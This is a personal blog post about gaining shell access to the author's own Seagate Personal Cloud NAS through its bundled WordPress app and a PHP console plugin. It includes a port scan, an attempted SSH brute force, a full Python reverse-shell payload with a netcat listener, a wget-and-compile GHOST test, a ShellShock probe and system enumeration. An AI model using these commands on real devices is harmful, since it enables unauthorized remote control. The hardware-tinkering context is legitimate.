I needed a cheap NAS system and had originally intended to give this one away as a gift to a relative for Christmas. However, said relative isn’t very technical and tl;dr I’m awful at choosing gifts for people so I decided to poke the proprietary device and see if we could have some fun with it.
The exact model that we will be talking about in this post is the Seagate Personal Cloud 3TB (STCR3000101).Here are a list of useful features:
- Time Machine backup support for OS X (Broken on El Capitan)
- Stream to Chromecast / AppleTV / Roku, LG & Samsung smart TVs
- Use the Seagate media app to access content remotely
- Web based control panel
- Ability to install 3rd party applications like WordPress, OwnCloud, and Plex media server (This functionality will be important later)
- more features are included but less important to me
So let’s start up by connecting this thing to our network and perform a port scan.
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
82/tcp open xfer
83/tcp open mit-ml-dev
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
548/tcp open afp
631/tcp open ipp
1080/tcp open socks
2222/tcp open EtherNetIP-1
3128/tcp open squid-http
8000/tcp open http-alt
8080/tcp open http-proxy
8088/tcp open radan-http
8888/tcp open sun-answerbook
9000/tcp open cslistener
9091/tcp open xmltec-xmlmail
As you can see there isn’t anything special, but there are some services we care about like SSH / SFTP, HTTP(s), etc. My initial test of bruteforcing the root user via SSH and sFTP did not seem to work. So looks like we’ll have to find another way to get shell access.
I mentioned about the useful features this proprietary NAS comes with, and this is exactly what we will be taking advantage of to get our shell today. How can we get shell access without SSH?
First we will need install and activate WordPress on the NAS and from here we can install a plugin that will allow us to execute PHP code on the device. Using this PHP code we will tell the NAS to connect to our computer and execute system commands. Sounds easy enough right?
- Login to the NAS
- On the left side under categories click ‘All’
- Scroll towards the bottom of the page and click ‘WordPress’
- Click ‘install’. This will take a few moments.
- Setup your new WordPress installation at http://
/apps/wordpress/. The version that was installed is pretty ancient — so don’t update it. We could use this later 🙂
- Once the installation is complete install the ‘WP PHP Console’ plugin as well as follow the instructions for setting up the Chrome extension and configuring the passphrase to access the PHP console via the plugin’s settings.
- Now you should be able to execute PHP code remotely from the browser via the Chrome PHP console extension when you visit the WordPress application that we installed to the NAS.
- Run the following to confirm that you can execute shell commands with PHP.
<?php system("id && grep $(whoami) /etc/passwd"); ?>
- You should be able to see the output of your PHP executed code in the javascript console of the Chrome browser. Here you can see that we are the www-data user (common in stock Apache deployments) and we have /bin/sh as our shell.
- On your computer start a netcat listener on port 1337
$ netcat -nlvp 1337
- Execute the following PHP code in your WordPress PHP Console, replacing the IP address in the example with the LAN IP assigned to your computer. This will open a PHP process and execute a Python reverse shell to our computer. Normally I would say since we are already in PHP then we should just use that, but it was not playing nice so I had to get a little hacky with it.
<?php set_time_limit(0);
system('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.251",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
?>
Congratulations! Now you can explore your proprietary NAS using your illegitimate shell. Aren’t reverse shells fun?
We’re an underprivileged user on the machine, let’s see what we have access to.
- gcc (we can compile privilege escalation exploits)
- wget
- ln (symlinks!)
- Perl
- Python (PyPI)
- Pip
- openssl
I’m sure there’s more, but these are some of the most useful binaries that we can use to escalate our privileges.
What type of recent vulnerabilities is this machine vulnerable to at the time of this posting?
Ghost (CVE-2015-0235) [VULNERABLE]
$ f=$(pwd)/ghost.c; wget --no-check-certificate https://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c -O $f 2>/dev/null && gcc $f -o $(pwd)/ghost && $(pwd)/ghost && rm $(pwd)/ghost $(pwd)/ghost.c vulnerable
ShellShock (CVE-2014-6271)
$ x='() { :;}; echo vulnerable to ShellShock :\)' bash -c : vulnerable to ShellShock :)
What distro of Linux is this box running?
$ cat /etc/*release
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
NAME="Debian GNU/Linux"
VERSION_ID="7"
VERSION="7 (wheezy)"
ID=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support/"
BUG_REPORT_URL="http://bugs.debian.org/"
Kernel information at the time of this posting
$ uname -a
Linux PersonalCloud 3.10.59-svn15282 #1 Sat Jun 13 08:25:10 UTC 2015 armv7l GNU/Linux
CPU information
$ lscpu
Architecture: armv7l
Byte Order: Little Endian
CPU(s): 1
On-line CPU(s) list: 0
Thread(s) per core: 1
Core(s) per socket: 1
Socket(s): 1
That’s about it 🙂 Now we can see running processes and read files on this quite proprietary device. This may void any warranty you have for this device.. I haven’t really looked into it nor do I care enough about my warranty. Now that I have a shell I can write shell scripts to run on my NAS as well as connect it to my Raspberry Pi and more easily troubleshoot any problems that I may have. If one wanted to take this even further they could use some form of privilege escalation to get root on the device.
One last curious fact about this situation is that the device also accepts HTTPs. I wonder if Seagate uses the same key for all of the devices?
The www-data user does not seem to be able to access the key 🙁 More incentive to get a privilege escalation I suppose.
